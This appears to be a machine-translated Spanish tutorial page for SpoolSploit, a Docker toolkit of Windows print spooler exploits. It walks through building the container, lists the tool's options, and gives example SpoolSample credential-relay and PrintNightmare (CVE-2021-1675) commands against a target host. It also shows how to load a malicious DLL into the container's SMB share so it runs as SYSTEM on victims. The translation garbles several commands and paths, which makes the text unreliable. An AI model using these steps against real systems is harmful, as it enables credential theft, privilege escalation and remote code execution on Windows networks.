Tutoriales

Una colección de exploits de cola de impresión de Windows en contenedores

CarreteSploit es una colección de exploits de cola de impresión de Windows que se empaquetan con otras utilidades para uso práctico. Algunos métodos muy efectivos serían filtrar las credenciales de la cuenta de la computadora para escalar privilegios y ejecutar archivos DLL maliciosos en puntos finales con acceso completo al sistema.

Empezado

A partir de la fecha de lanzamiento, el contenedor SpoolSploit Docker se actualizó correctamente a las últimas versiones de. probado MacOS, Ubuntu Linux, y Windows 10.

Si bien no es necesario, si planea alojar archivos DLL maliciosos o realizar ataques de retransmisión de credenciales, todo dentro del contenedor SpoolSploit, debe asegurarse de que el puerto 445 no se esté utilizando en el host que ejecuta Docker. Esto es más común cuando este contenedor se ejecuta en un host de Windows porque usa el puerto 445 de forma predeterminada. Si deshabilitar el puerto 445 en su host no es práctico, ¡está bien! Simplemente puede ejecutar el contenedor Docker en una máquina virtual con el adaptador de red configurado en modo puente. Esto puede proporcionar credenciales de retransmisión y DLL maliciosas. Si solo desea servir archivos DLL maliciosos, simplemente puede alojar los archivos DLL en un recurso compartido de acceso anónimo en su sistema operativo host o en un recurso compartido de servidor comprometido.

Crear y acceder al contenedor de Docker SpoolSploit

clon de git https://github.com/BeetleChunks/SpoolSploit

  • Compilar la imagen del contenedor de SpoolSploit Docker

carrete de cd
sudo docker build -t spoolsploit.

  • Cree e inicie el contenedor de Docker SpoolSploit

sudo docker run -dit -p 445: 445 -name spoolsploit spoolsploit: latest

sudo docker exec -it spoolsploit / bin / bash

Uso de la línea de comandos

Uso: spool_sploit.py [-h] -a muestra de carrete, pesadilla -rH RHOST -rP 139,445 [-lH LHOST] [-lS LSHARE] -d DOMINIO -u USUARIO -p PASSWD
argumentos opcionales:
-h, –help Muestra este mensaje de ayuda y sale
-a spoolsample, nightmare, –attack spoolsample, nightmare
Tipo de ataque que se llevará a cabo sobre el objetivo o los objetivos.
-rH RHOST, -ost RHOST
IP de destino remoto, rango CIDR o nombre de archivo (archivo 🙂
-rP 139,445, -rport 139,445
Puerto del servidor SMB remoto.
-lH LHOST, -lhost LHOST
Escuchando nombre de host o IP
-lS LSHARE, -lshare LSHARE
Compartir SMB provisional (UNC)
-d DOMINIO, -dominio DOMINIO
Dominio para autenticación
-u USER, –username USER
Nombre de usuario para autenticación
-p PASSWD, –Password PASSWD
Contraseña para autenticación
Ejemplo: muestra de bobina:
python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p ‘P4ssword123!’ -rP 445 -rH 10.5.1.10
Ejemplo – pesadilla:
python3 spool_sploit.py -a nightmare -lS ‘ 10.14.1.24 C $ CreateAdmin.dll’ -d evil.corp -u rjmcdow -p ‘P4ssword123!’ -rP 445 -rH 10.5.1.10

SpoolSample: recopilación y reenvío de credenciales para cuentas de computadora con Windows

El contenedor de SpoolSploit Docker contiene un respondedor para reenviar los hashes de la cuenta de la máquina generados por la ejecución del spoolsample Ataque en SpoolSploit. Dado que hay varios artículos excelentes que describen el proceso de compartir credenciales para cuentas de computadoras privilegiadas para la escalada de privilegios, no entraré en esos detalles aquí.

pag.rintNightmare (CVE-2021-1675): ejecute archivos DLL maliciosos en objetivos de Windows como SYSTEM. el fin

El contenedor SpoolSploit contiene un servidor SMB que se implementa a través de Impacket. Este servidor se puede utilizar para alojar archivos DLL maliciosos si el printnightmare Ataque en SpoolSploit. La configuración predeterminada del servidor SMB funcionará, pero si desea personalizarla, puede cambiar el archivo de configuración en /home/dlogmas/smbserver/smb-v1.conf.

Todo lo que tiene que hacer es copiar su DLL a la carpeta compartida del servidor SMB en el contenedor SpoolSploit. La ruta compartida en el contenedor es /home/dlogmas/smbserver/share/. Los siguientes comandos demuestran cómo cargar una DLL en el contenedor SpoolSploit y hacerla accesible para el servidor SMB.

sudo docker cp ./malicious.dll spoolsploit: / home / dlogmas / smbserver / share /
sudo docker exec spoolsploit / bin / sh -c ‘sudo chown dlogmas: dlogmas /home/dlogmas/smbserver/share/malicious.dll’

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba